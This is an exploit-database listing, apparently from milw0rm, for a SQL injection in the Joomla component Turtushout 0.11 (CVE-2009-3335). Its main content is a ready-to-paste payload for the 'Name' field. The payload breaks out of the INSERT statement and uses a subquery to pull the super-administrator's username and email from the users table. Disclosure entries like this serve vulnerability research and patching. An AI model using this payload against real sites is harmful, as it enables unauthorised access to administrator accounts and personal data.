Joomla! Component Turtushout 0.11 - 'Name' SQL Injection



EKU-ID: 17416 CVE: OSVDB-58362;CVE-2009-3335 OSVDB-ID:
Author: jdc Published: 2009-09-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


Joomla Component Turtushout 0.11SQL Injection

'Name' field SQL injection:

test', '0.0.0.0' ), ( 'test', ( SELECT CONCAT( username, 0x20, email ) FROM #__users WHERE gid=25 limit 1 ), '2009-08-07 13:52:38', 0, 'test', '0.0.0.0' ) -- '

jdc 2009

# milw0rm.com [2009-09-14]